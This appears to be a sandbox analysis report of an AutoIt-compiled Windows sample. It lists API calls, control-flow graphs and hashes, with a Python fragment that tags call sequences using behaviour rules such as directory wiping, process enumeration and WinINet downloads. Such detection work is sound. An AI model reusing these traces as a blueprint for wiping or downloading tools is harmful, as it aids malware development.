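• Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
• FindFirstFileW.KERNEL32(?,?), ref: 009FDCCB
• DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDD1B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDD2C
• FindClose.KERNEL32(00000000), ref: 009FDD43
• FindClose.KERNEL32(00000000), ref: 009FDD4C
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00A0D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00A0D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0DA37
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 009FDDAC
• Process32FirstW.KERNEL32(00000000,?), ref: 009FDDBA
• Process32NextW.KERNEL32(00000000,?), ref: 009FDDDA
• FindCloseChangeNotification.KERNEL32(00000000), ref: 009FDE87
APIs
• lstrlenW.KERNEL32(?,009D46AC), ref: 009FE482
• GetFileAttributesW.KERNEL32(?), ref: 009FE491
• FindFirstFileW.KERNEL32(?,?), ref: 009FE4A2
• FindClose.KERNEL32(00000000), ref: 009FE4AE
"""

# One API bullet: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDR". The Toolhelp line has no parentheses.
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# kernel32 exports FindCloseChangeNotification and CloseHandle at the same
# address, so address-to-name symbolisation may print either; fold them.
EXPORT_ALIASES = {"FindCloseChangeNotification": "CloseHandle"}

# Ordered API subsequences (gaps allowed). Assumed rule table for illustration.
RULES = {
    "directory_wipe": ["FindFirstFileW", "DeleteFileW", "FindNextFileW", "FindClose"],
    "process_enumeration": ["CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW", "CloseHandle"],
    "wininet_download_loop": ["InternetQueryDataAvailable", "InternetReadFile"],
    "path_exists_probe": ["GetFileAttributesW", "FindFirstFileW", "FindClose"],
}


def parse_api_blocks(text):
    """Split the text at each 'APIs' heading; return one record per function."""
    records = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            records.append({"direct": [], "subcalls": []})
            continue
        m = LINE_RE.match(line)
        if not m or not records:
            raise ValueError(f"unrecognised API line: {line!r}")
        call = {
            "api": EXPORT_ALIASES.get(m["api"], m["api"]),
            "raw_api": m["api"],
            "module": m["mod"],
            "args": [a for a in (m["args"] or "").split(",") if a],
            "ref": int(m["ref"], 16),
        }
        if m["sub"]:                      # made by a callee, not by this function
            call["subcall"] = int(m["sub"], 16)
            records[-1]["subcalls"].append(call)
        else:
            records[-1]["direct"].append(call)
    return records


def is_subsequence(needle, hay):
    """True if every item of needle appears in hay in the same order."""
    it = iter(hay)
    return all(any(x == h for h in it) for x in needle)


def tag_record(rec):
    """Rule names whose API pattern appears, in order, among the direct calls."""
    seq = [c["api"] for c in rec["direct"]]
    return [name for name, pattern in RULES.items() if is_subsequence(pattern, seq)]


def analyse_report(text):
    """[(lowest direct call address as hex, [tags])] for each function record."""
    out = []
    for rec in parse_api_blocks(text):
        first = min(c["ref"] for c in rec["direct"]) if rec["direct"] else None
        out.append((f"{first:08X}" if first is not None else None, tag_record(rec)))
    return out


if __name__ == "__main__":
    for ref, tags in analyse_report(SAMPLE):
        print(ref, tags)
```

Matching on ordered subsequences rather than exact lists keeps the rules tolerant of interleaved calls such as GetLastError and SetEvent in the WinINet record, while the alias table stops the CloseHandle step of the process-walk rule from being missed because the report printed the other export name.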
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: 2c07e4f5d94f4d0a1b281fb06fb69cf5cffb13e909a3a85c0d9d0cf913b24f25
• Instruction ID: 84293fd6693c03fb4151612f73edd297752402442761e35aa9b6cffc46b53ab2
• Opcode Fuzzy Hash: 2c07e4f5d94f4d0a1b281fb06fb69cf5cffb13e909a3a85c0d9d0cf913b24f25
• Instruction Fuzzy Hash: 58F0E53041091497D224A7BCAC0D8BB776EAE12336B504719F936C24F0E7789D978795
APIs
• GetCurrentProcess.KERNEL32(?,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002,00000000), ref: 009B5079
• TerminateProcess.KERNEL32(00000000,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002,00000000), ref: 009B5080
• ExitProcess.KERNEL32 ref: 009B5092
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 31c5f8a65a78554cc0ee369a6c43aa723babef366da1822b0da7d49d4f2c6739
                                                                                                                                                                                                                                  • Instruction ID: 6391eb28071f1eec84bab492029364155e99d2e4b39e9daf8550dc9da4141c65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31c5f8a65a78554cc0ee369a6c43aa723babef366da1822b0da7d49d4f2c6739
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE0B631401548AFCF21BF98DE09FA83B69EB553A1F128424F8499A562DB35DD53CAC1

Control-flow Graph

APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A0CEF5
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A0CF08
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A0CF1C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A0CF35
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A0CF78
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A0CF8E
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A0CF99
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A0CFC9
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A0D021
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A0D035
• InternetCloseHandle.WININET(00000000), ref: 00A0D040
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: 05adce7e9149ca27d39380132093df77e704b7ee48ee5f9e483ffe636f6ef8a9
• Instruction ID: b8a4b794867b9f6dc30580c116f9c136f3aa80681b135678b12d11d48f2ddbfd
• Opcode Fuzzy Hash: 05adce7e9149ca27d39380132093df77e704b7ee48ee5f9e483ffe636f6ef8a9
• Instruction Fuzzy Hash: 7E51BFB1500708BFDB21CFA4DD88ABB7BBCFF08354F004529F94696191D734D906AB60
APIs
• GetInputState.USER32 ref: 0099EF07
• timeGetTime.WINMM ref: 0099F107
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0099F228
• TranslateMessage.USER32(?), ref: 0099F27B
• DispatchMessageW.USER32(?), ref: 0099F289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0099F29F
• Sleep.KERNEL32(0000000A), ref: 0099F2B1
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: bd3e200b3474a8ae654dab160ac497578cca4f6ce39eda32da63e0f1e49ec529
• Instruction ID: c1f6e3c1b26ec2c6ca506bf1f6efb64e8bedd0161c4de71d9edec7d92f8de4b4
• Opcode Fuzzy Hash: bd3e200b3474a8ae654dab160ac497578cca4f6ce39eda32da63e0f1e49ec529
• Instruction Fuzzy Hash: 5732E030608741EFDB29CF29C855BAAF7E8BF81304F148929E565C7292C775ED85CB82

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00993657
• RegisterClassExW.USER32(00000030), ref: 00993681
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00993692
• InitCommonControlsEx.COMCTL32(?), ref: 009936AF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009936BF
• LoadIconW.USER32(000000A9), ref: 009936D5
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009936E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 7e667cb51cfda7976f944efea8e8a4a5dcea1f153f2bc11a76aa5ab4af60af93
• Instruction ID: 492c367ea4dc2c3940bec6fdcb1296b044dbdb35e97feb4030f2747ebe8c2ec7
• Opcode Fuzzy Hash: 7e667cb51cfda7976f944efea8e8a4a5dcea1f153f2bc11a76aa5ab4af60af93
• Instruction Fuzzy Hash: 2521C0B2D01718AFDB10DFE8E889BADBBB4FB08710F10412AF611A62A1D7B545468F94

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 403 9d09db-9d0a0b call 9d07af 406 9d0a0d-9d0a18 call 9bf636 403->406 407 9d0a26-9d0a32 call 9c5594 403->407 412 9d0a1a-9d0a21 call 9bf649 406->412 413 9d0a4b-9d0a94 call 9d071a 407->413 414 9d0a34-9d0a49 call 9bf636 call 9bf649 407->414 423 9d0cfd-9d0d03 412->423 421 9d0a96-9d0a9f 413->421 422 9d0b01-9d0b0a GetFileType 413->422 414->412 426 9d0ad6-9d0afc GetLastError call 9bf613 421->426 427 9d0aa1-9d0aa5 421->427 428 9d0b0c-9d0b3d GetLastError call 9bf613 CloseHandle 422->428 429 9d0b53-9d0b56 422->429 426->412 427->426 432 9d0aa7-9d0ad4 call 9d071a 427->432 428->412 440 9d0b43-9d0b4e call 9bf649 428->440 430 9d0b5f-9d0b65 429->430 431 9d0b58-9d0b5d 429->431 435 9d0b69-9d0bb7 call 9c54dd 430->435 436 9d0b67 430->436 431->435 432->422 432->426 446 9d0bb9-9d0bc5 call 9d092b 435->446 447 9d0bc7-9d0beb call 9d04cd 435->447 436->435 440->412 446->447 454 9d0bef-9d0bf9 call 9c8a2e 446->454 452 9d0bed 447->452 453 9d0bfe-9d0c41 447->453 452->454 456 9d0c43-9d0c47 453->456 457 9d0c62-9d0c70 453->457 454->423 456->457 459 9d0c49-9d0c5d 456->459 460 9d0cfb 457->460 461 9d0c76-9d0c7a 457->461 459->457 460->423 461->460 462 9d0c7c-9d0caf CloseHandle call 9d071a 461->462 465 9d0cb1-9d0cdd GetLastError call 9bf613 call 9c56a6 462->465 466 9d0ce3-9d0cf7 462->466 465->466 466->460
APIs
  • Part of subcall function 009D071A: CreateFileW.KERNEL32(00000000,00000000,?,009D0A84,?,?,00000000,?,009D0A84,00000000,0000000C), ref: 009D0737
• GetLastError.KERNEL32 ref: 009D0AEF
• __dosmaperr.LIBCMT ref: 009D0AF6
• GetFileType.KERNEL32(00000000), ref: 009D0B02
• GetLastError.KERNEL32 ref: 009D0B0C
• __dosmaperr.LIBCMT ref: 009D0B15
• CloseHandle.KERNEL32(00000000), ref: 009D0B35
• CloseHandle.KERNEL32(?), ref: 009D0C7F
• GetLastError.KERNEL32 ref: 009D0CB1
• __dosmaperr.LIBCMT ref: 009D0CB8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 2417c873971b6b4477a5baccf94dc0f322ae1783ccb07646c2b2a1ecf34bc1c1
• Instruction ID: e4a50b962a0a33c7e93bc9dab393f4d170886ae350b30645263597a6363646a0
• Opcode Fuzzy Hash: 2417c873971b6b4477a5baccf94dc0f322ae1783ccb07646c2b2a1ecf34bc1c1
• Instruction Fuzzy Hash: B9A13232A541089FCF18EFB8DC52BAE3BA4AB86320F14415EF8119F3A1D7359913CB52

Control-flow Graph

APIs
  • Part of subcall function 00995594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 009955B2
  • Part of subcall function 00995238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0099525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009953C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009D4BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009D4C3E
• RegCloseKey.ADVAPI32(?), ref: 009D4C80
• _wcslen.LIBCMT ref: 009D4CE7
• _wcslen.LIBCMT ref: 009D4CF6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 408527733016d8cd9aa75cd6114c3d0dd0715c281173cf3bfdb2dbe02a5cb200
• Instruction ID: 81a04f87a6beb5cf9e7495ce28cb210a51d66a979a73a2aae51dce29cc2a1305
• Opcode Fuzzy Hash: 408527733016d8cd9aa75cd6114c3d0dd0715c281173cf3bfdb2dbe02a5cb200
• Instruction Fuzzy Hash: 9771A1725053009FCB04EFA9EC45AABBBF8FF94750F40442EF545872A1DBB19A4ACB51

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 009934DE
• LoadCursorW.USER32(00000000,00007F00), ref: 009934ED
• LoadIconW.USER32(00000063), ref: 00993503
• LoadIconW.USER32(000000A4), ref: 00993515
• LoadIconW.USER32(000000A2), ref: 00993527
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0099353F
• RegisterClassExW.USER32(?), ref: 00993590
  • Part of subcall function 00993624: GetSysColorBrush.USER32(0000000F), ref: 00993657
  • Part of subcall function 00993624: RegisterClassExW.USER32(00000030), ref: 00993681
  • Part of subcall function 00993624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00993692
  • Part of subcall function 00993624: InitCommonControlsEx.COMCTL32(?), ref: 009936AF
  • Part of subcall function 00993624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009936BF
  • Part of subcall function 00993624: LoadIconW.USER32(000000A9), ref: 009936D5
  • Part of subcall function 00993624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009936E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 0cc7adb710349332c404bf284d723ebea109c53f3d634a87c4b70f195b5ba549
• Instruction ID: 955b621e7a298a1decbfd26809d0f91d8f9120eed48b00725f210b84af379f2d
• Opcode Fuzzy Hash: 0cc7adb710349332c404bf284d723ebea109c53f3d634a87c4b70f195b5ba549
• Instruction Fuzzy Hash: 18210C71D10714ABDB10DFE9EC59BA97FB4FB48750F00402AE604BA3A1D7F945468F90

Control-flow Graph

APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00A11019
• inet_addr.WSOCK32(?), ref: 00A11079
• gethostbyname.WS2_32(?), ref: 00A11085
• IcmpCreateFile.IPHLPAPI ref: 00A11093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A11123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A11142
• IcmpCloseHandle.IPHLPAPI(?), ref: 00A11216
• WSACleanup.WSOCK32 ref: 00A1121C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                  • String ID: Ping
                                                                                                                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                  • Opcode ID: ec47fdf223d4b7a9f90cf00b421f779140ad94cfa246524941fef40d522b2d3a
                                                                                                                                                                                                                                  • Instruction ID: ec633c57e51b94fe5a9d6a0ee2ce2411f14cdf42d8db11bb9719492ae938a657
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec47fdf223d4b7a9f90cf00b421f779140ad94cfa246524941fef40d522b2d3a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F691A371604241AFD720DF19C884F56BBE0FF88318F1485ADF6658B6A2C735ED86CB81

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 614 99370f-993724 615 993784-993786 614->615 616 993726-993729 614->616 615->616 619 993788 615->619 617 99372b-993732 616->617 618 99378a 616->618 622 993738-99373d 617->622 623 993804-99380c PostQuitMessage 617->623 620 9d3df4-9d3e1c call 992f92 call 9af23c 618->620 621 993790-993795 618->621 624 99376f-993777 DefWindowProcW 619->624 660 9d3e21-9d3e28 620->660 625 9937bc-9937e3 SetTimer RegisterWindowMessageW 621->625 626 993797-99379a 621->626 627 993743-993747 622->627 628 9d3e61-9d3e75 call 9fc8f7 622->628 631 9937b8-9937ba 623->631 630 99377d-993783 624->630 625->631 634 9937e5-9937f0 CreatePopupMenu 625->634 632 9d3d95-9d3d98 626->632 633 9937a0-9937b3 KillTimer call 993907 call 9959ff 626->633 635 99374d-993752 627->635 636 99380e-993818 call 9afcad 627->636 628->631 653 9d3e7b 628->653 631->630 639 9d3d9a-9d3d9e 632->639 640 9d3dd0-9d3def MoveWindow 632->640 633->631 634->631 642 993758-99375d 635->642 643 9d3e46-9d3e4d 635->643 655 99381d 636->655 647 9d3dbf-9d3dcb SetFocus 639->647 648 9d3da0-9d3da3 639->648 640->631 651 993763-993769 642->651 652 9937f2-993802 call 99381f 642->652 643->624 650 9d3e53-9d3e5c call 9f1423 643->650 647->631 648->651 656 9d3da9-9d3dba call 992f92 648->656 650->624 651->624 651->660 652->631 653->624 655->631 656->631 660->624 664 9d3e2e-9d3e41 call 993907 call 99396b 660->664 664->624
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00993709,?,?), ref: 00993777
• KillTimer.USER32(?,00000001,?,?,?,?,?,00993709,?,?), ref: 009937A3
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009937C6
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00993709,?,?), ref: 009937D1
• CreatePopupMenu.USER32 ref: 009937E5
• PostQuitMessage.USER32(00000000), ref: 00993806
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 4fb6e02152441cc6114449f918c93816a37f753c01d0bc8cf0ec192926513035
• Instruction ID: 2d8a6aecbf878adef5e540b58f5c62d50735f98326db350c80fdb7ecd81ec688
• Opcode Fuzzy Hash: 4fb6e02152441cc6114449f918c93816a37f753c01d0bc8cf0ec192926513035
• Instruction Fuzzy Hash: 734105F5240644BBDF24AFFC9C4DB793A79E780301F04C625F502CA2A1DAB89F469762

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 670 992ab0-992ae9 671 992aef-992b05 mciSendStringW 670->671 672 9d3a1a-9d3a1b DestroyWindow 670->672 673 992b0b-992b13 671->673 674 992d66-992d73 671->674 675 9d3a26-9d3a33 672->675 673->675 676 992b19-992b28 call 992ede 673->676 677 992d98-992d9f 674->677 678 992d75-992d90 UnregisterHotKey 674->678 679 9d3a35-9d3a38 675->679 680 9d3a62-9d3a69 675->680 691 992b2e-992b36 676->691 692 9d3a70-9d3a7c 676->692 677->673 683 992da5 677->683 678->677 682 992d92-992d93 call 992770 678->682 684 9d3a3a-9d3a42 call 997aab 679->684 685 9d3a44-9d3a47 FindClose 679->685 680->675 688 9d3a6b 680->688 682->677 683->674 690 9d3a4d-9d3a5a 684->690 685->690 688->692 690->680 696 9d3a5c-9d3a5d call a03cf6 690->696 697 992b3c-992b61 call 99e6a0 691->697 698 9d3a94-9d3aa1 691->698 693 9d3a7e-9d3a80 FreeLibrary 692->693 694 9d3a86-9d3a8d 692->694 693->694 694->692 699 9d3a8f 694->699 696->680 708 992b98-992ba3 OleUninitialize 697->708 709 992b63 697->709 700 9d3ac8-9d3acf 698->700 701 9d3aa3-9d3ac0 VirtualFree 698->701 699->698 700->698 705 9d3ad1 700->705 701->700 704 9d3ac2-9d3ac3 call a03d5c 701->704 704->700 711 9d3ad6-9d3ada 705->711 710 992ba9-992bae 708->710 708->711 712 992b66-992b96 call 9930c0 call 993069 709->712 713 9d3aeb-9d3af8 call a03d30 710->713 714 992bb4-992bbe 710->714 711->710 715 9d3ae0-9d3ae6 711->715 712->708 726 9d3afa 713->726 719 992bc4-992c45 call 99bd98 call 992ff4 call 992e85 call 9b0184 call 992e1c call 99bd98 call 99e6a0 call 992eae call 9b0184 714->719 720 992da7-992db4 call 9afb19 714->720 715->710 732 9d3aff-9d3b21 call 9b013d 719->732 760 992c4b-992c6f call 9b0184 719->760 720->719 730 992dba 720->730 726->732 730->720 738 9d3b23 732->738 741 9d3b28-9d3b4a call 9b013d 738->741 748 9d3b4c 741->748 751 9d3b51-9d3b73 call 9b013d 748->751 756 9d3b75 751->756 759 9d3b7a-9d3b87 call 9f6e3b 756->759 765 9d3b89 759->765 760->741 766 992c75-992c99 call 9b0184 760->766 768 9d3b8e-9d3b9b call 9abdf0 765->768 766->751 771 992c9f-992cb9 call 9b0184 766->771 775 9d3b9d 768->775 771->759 776 992cbf-992ce3 call 992e85 call 9b0184 771->776 778 9d3ba2-9d3baf call a03c8a 775->778 776->768 785 992ce9-992cf1 776->785 783 9d3bb1 778->783 786 9d3bb6-9d3bc3 call a03d11 783->786 785->778 787 992cf7-992d15 call 99bd98 call 992fba 785->787 792 9d3bc5 786->792 787->786 796 992d1b-992d29 787->796 795 9d3bca-9d3bd7 call a03d11 792->795 802 9d3bd9 795->802 796->795 798 992d2f-992d65 call 99bd98 * 3 call 992f26 796->798 802->802
